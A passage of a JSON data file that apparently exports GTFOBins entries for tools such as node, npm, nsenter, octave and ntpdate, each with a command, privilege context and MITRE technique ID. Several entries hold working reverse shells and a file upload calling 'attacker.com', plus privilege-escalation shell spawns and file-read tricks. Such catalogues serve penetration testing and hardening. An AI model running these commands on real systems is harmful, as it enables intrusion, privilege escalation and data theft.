installation","aliases":[]},{"id":"gtfo:node:file-write:0:sudo","toolId":"gtfo:node","toolName":"node","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"node -e 'require(\"fs\").writeFileSync(\"/path/to/output-file\", \"DATA\")'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/node/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:node:file-write:0:suid","toolId":"gtfo:node","toolName":"node","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"node -e 'require(\"fs\").writeFileSync(\"/path/to/output-file\", \"DATA\")'","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/node/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:node:file-write:0:unprivileged","toolId":"gtfo:node","toolName":"node","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"node -e 'require(\"fs\").writeFileSync(\"/path/to/output-file\", \"DATA\")'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/node/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:node:reverse-shell:0:sudo","toolId":"gtfo:node","toolName":"node","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"node -e 'sh = require(\"child_process\").spawn(\"/bin/sh\");\nrequire(\"net\").connect(12345, \"attacker.com\", function () {\n this.pipe(sh.stdin);\n sh.stdout.pipe(this);\n sh.stderr.pipe(this);\n})'","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/node/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:node:reverse-shell:0:suid","toolId":"gtfo:node","toolName":"node","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"node -e 'sh = require(\"child_process\").spawn(\"/bin/sh\", [\"-p\"]);\nrequire(\"net\").connect(12345, \"attacker.com\", function () {\n this.pipe(sh.stdin);\n sh.stdout.pipe(this);\n sh.stderr.pipe(this);\n})'","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/node/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:node:reverse-shell:0:unprivileged","toolId":"gtfo:node","toolName":"node","name":"reverse-shell","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"node -e 'sh = require(\"child_process\").spawn(\"/bin/sh\");\nrequire(\"net\").connect(12345, \"attacker.com\", function () {\n this.pipe(sh.stdin);\n sh.stdout.pipe(this);\n sh.stderr.pipe(this);\n})'","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/node/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:node:shell:0:capabilities","toolId":"gtfo:node","toolName":"node","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"node -e 'process.setuid(0); require(\"child_process\").spawn(\"/bin/sh\", {stdio: [0, 1, 2]})'","mitre":["T1059"],"privilege":"capabilities","context":"capabilities","references":["https://gtfobins.github.io/gtfobins/node/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:node:shell:0:sudo","toolId":"gtfo:node","toolName":"node","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"node -e 'require(\"child_process\").spawn(\"/bin/sh\", {stdio: [0, 1, 2]})'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/node/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:node:shell:0:suid","toolId":"gtfo:node","toolName":"node","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"node -e 'require(\"child_process\").spawn(\"/bin/sh\", [\"-p\"], {stdio: [0, 1, 2]})'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/node/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:node:shell:0:unprivileged","toolId":"gtfo:node","toolName":"node","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"node -e 'require(\"child_process\").spawn(\"/bin/sh\", {stdio: [0, 1, 2]})'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/node/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:node:upload:0:sudo","toolId":"gtfo:node","toolName":"node","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"node -e 'require(\"fs\").createReadStream(\"/path/to/input-file\").pipe(require(\"http\").request(\"http://attacker.com/path/to/output-file\"))'","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/node/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:node:upload:0:suid","toolId":"gtfo:node","toolName":"node","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"node -e 'require(\"fs\").createReadStream(\"/path/to/input-file\").pipe(require(\"http\").request(\"http://attacker.com/path/to/output-file\"))'","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/node/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:node:upload:0:unprivileged","toolId":"gtfo:node","toolName":"node","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"node -e 'require(\"fs\").createReadStream(\"/path/to/input-file\").pipe(require(\"http\").request(\"http://attacker.com/path/to/output-file\"))'","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/node/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nohup:command:0:sudo","toolId":"gtfo:nohup","toolName":"nohup","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"nohup /path/to/command\ncat nohup.out","description":"The `nohup.out` file contains the standard output and error of the command.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nohup/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nohup:command:0:suid","toolId":"gtfo:nohup","toolName":"nohup","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"nohup /path/to/command\ncat nohup.out","description":"The `nohup.out` file contains the standard output and error of the command.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nohup/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nohup:command:0:unprivileged","toolId":"gtfo:nohup","toolName":"nohup","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"nohup /path/to/command\ncat nohup.out","description":"The `nohup.out` file contains the standard output and error of the command.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nohup/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nohup:shell:0:sudo","toolId":"gtfo:nohup","toolName":"nohup","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"nohup /bin/sh -c '/bin/sh </dev/tty >/dev/tty 2>/dev/tty'","description":"This creates a `nohup.out` file in the current working directory.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nohup/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nohup:shell:0:suid","toolId":"gtfo:nohup","toolName":"nohup","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"nohup /bin/sh -p -c '/bin/sh -p </dev/tty >/dev/tty 2>/dev/tty'","description":"This creates a `nohup.out` file in the current working directory.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nohup/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nohup:shell:0:unprivileged","toolId":"gtfo:nohup","toolName":"nohup","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"nohup /bin/sh -c '/bin/sh </dev/tty >/dev/tty 2>/dev/tty'","description":"This creates a `nohup.out` file in the current working directory.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nohup/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:npm:shell:0:sudo","toolId":"gtfo:npm","toolName":"npm","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"npm exec /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/npm/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:npm:shell:0:unprivileged","toolId":"gtfo:npm","toolName":"npm","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"npm exec /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/npm/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:npm:shell:1:sudo","toolId":"gtfo:npm","toolName":"npm","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '{\"scripts\": {\"preinstall\": \"/bin/sh\"}}' >package.json\nnpm -C . i","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/npm/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:npm:shell:1:unprivileged","toolId":"gtfo:npm","toolName":"npm","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo '{\"scripts\": {\"preinstall\": \"/bin/sh\"}}' >package.json\nnpm -C . i","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/npm/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:npm:shell:2:sudo","toolId":"gtfo:npm","toolName":"npm","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '{\"scripts\": {\"xxx\": \"/bin/sh\"}}' >package.json\nnpm -C . run xxx","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/npm/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:npm:shell:2:unprivileged","toolId":"gtfo:npm","toolName":"npm","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo '{\"scripts\": {\"xxx\": \"/bin/sh\"}}' >package.json\nnpm -C . run xxx","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/npm/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nroff:file-read:0:sudo","toolId":"gtfo:nroff","toolName":"nroff","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"nroff /path/to/input-file","description":"The file is typeset and some warning messages may appear.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nroff/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nroff:file-read:0:unprivileged","toolId":"gtfo:nroff","toolName":"nroff","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"nroff /path/to/input-file","description":"The file is typeset and some warning messages may appear.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nroff/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nroff:shell:0:sudo","toolId":"gtfo:nroff","toolName":"nroff","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo /bin/sh >groff\nchmod +x groff\nGROFF_BIN_PATH=. nroff","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nroff/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nroff:shell:0:unprivileged","toolId":"gtfo:nroff","toolName":"nroff","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo /bin/sh >groff\nchmod +x groff\nGROFF_BIN_PATH=. nroff","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nroff/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nsenter:shell:0:sudo","toolId":"gtfo:nsenter","toolName":"nsenter","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"nsenter /bin/sh","description":"The shell command can be omitted.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nsenter/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nsenter:shell:0:suid","toolId":"gtfo:nsenter","toolName":"nsenter","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"nsenter /bin/sh -p","description":"The shell command can be omitted.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nsenter/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:nsenter:shell:0:unprivileged","toolId":"gtfo:nsenter","toolName":"nsenter","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"nsenter /bin/sh","description":"The shell command can be omitted.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nsenter/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ntpdate:file-read:0:sudo","toolId":"gtfo:ntpdate","toolName":"ntpdate","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ntpdate -a x -k /path/to/input-file -d localhost","description":"The file is actually parsed and lines are leaked through error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ntpdate/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ntpdate:file-read:0:suid","toolId":"gtfo:ntpdate","toolName":"ntpdate","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ntpdate -a x -k /path/to/input-file -d localhost","description":"The file is actually parsed and lines are leaked through error messages.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ntpdate/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ntpdate:file-read:0:unprivileged","toolId":"gtfo:ntpdate","toolName":"ntpdate","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"ntpdate -a x -k /path/to/input-file -d localhost","description":"The file is actually parsed and lines are leaked through error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ntpdate/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:octave:file-read:0:sudo","toolId":"gtfo:octave","toolName":"octave","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"octave-cli --eval 'format none; fid = fopen(\"/path/to/input-file\"); while(!feof(fid)); txt = fgetl(fid); disp(txt); endwhile; fclose(fid);'","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/octave/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:octave:file-read:0:suid","toolId":"gtfo:octave","toolName":"octave","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"octave-cli --eval 'format none; fid = fopen(\"/path/to/input-file\"); while(!feof(fid)); txt = fgetl(fid); disp(txt); endwhile; fclose(fid);'","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/octave/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:octave:file-read:0:unprivileged","toolId":"gtfo:octave","toolName":"octave","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"octave-cli --eval 'format none; fid = fopen(\"/path/to/input-file\"); while(!feof(fid)); txt = fgetl(fid); disp(txt); endwhile; fclose(fid);'","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/octave/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:octave:file-write:0:sudo","toolId":"gtfo:octave","toolName":"octave","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"octave-cli --eval 'fid = fopen(\"/path/to/output-file\", \"w\"); fputs(fid, \"DATA\"); fclose(fid);'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/octave/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:octave:file-write:0:suid","toolId":"gtfo:octave","toolName":"octave","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"octave-cli --eval 'fid = fopen(\"/path/to/output-file\", \"w\"); fputs(fid, \"DATA\"); fclose(fid);'","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/octave/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:octave:file-write:0:unprivileged","toolId":"gtfo:octave","toolName":"octave","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"octave-cli --eval 'fid = fopen(\"/path/to/output-file\", \"w\"); fputs(fid, \"DATA\"); fclose(fid);'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/octave/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:octave:shell:0:sudo","toolId":"gtfo:octave","toolName":"octave","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"octave-cli --eval 'system(\"/bin/sh\")'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/octave/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:octave:shell:0:suid","toolId":"gtfo:octave","toolName":"octave","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"octave-cli --eval 'system(\"/bin/sh\")'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/octave/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:octave:shell:0:unprivileged","toolId":"gtfo:octave","toolName":"octave","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"octave-cli --eval 'system(\"/bin/sh\")'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/octave/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:od:file-read:0:sudo","toolId":"gtfo:od","toolName":"od","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"od -An -c -w999 /path/to/input-file","description":"Three spaces are added before each character in the read file (wrapped at the specified value, i.e., `999`), and non-printable chars are printed as backslash escape sequences.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/od/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:od:file-read:0:suid","toolId":"gtfo:od","toolName":"od","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"od -An -c -w999 /path/to/input-file","description":"Three spaces are added before each character in the read file (wrapped at the specified value, i.e., `999`), and non-printable chars are printed as backslash escape sequences.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/od/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:od:file-read:0:unprivileged","toolId":"gtfo:od","toolName":"od","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"od -An -c -w999 /path/to/input-file","description":"Three spaces are added before each character in the read file (wrapped at the specified value, i.e., `999`), and non-printable chars are printed as backslash escape sequences.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/od/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:opencode:command:0:sudo","toolId":"gtfo:opencode","toolName":"opencode","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"opencode\n! /path/to/command","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/opencode/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:opencode:command:0:suid","toolId":"gtfo:opencode","toolName":"opencode","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"opencode\n! /path/to/command","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/opencode/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:opencode:command:0:unprivileged","toolId":"gtfo:opencode","toolName":"opencode","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"opencode\n! /path/to/command","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/opencode/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:opencode:inherit:0:sudo","toolId":"gtfo:opencode","toolName":"opencode","name":"inherit ← sqlite3","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:sqlite3"],"command":"opencode db '...'","description":"This allows to run SQLite queries (`...`) provided that `sqlite3` is installed.","mitre":["T1005","T1565","T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/opencode/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:opencode:inherit:0:unprivileged","toolId":"gtfo:opencode","toolName":"opencode","name":"inherit ← sqlite3","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution"],"nativeCategory":["inherit","from:sqlite3"],"command":"opencode db '...'","description":"This allows to run SQLite queries (`...`) 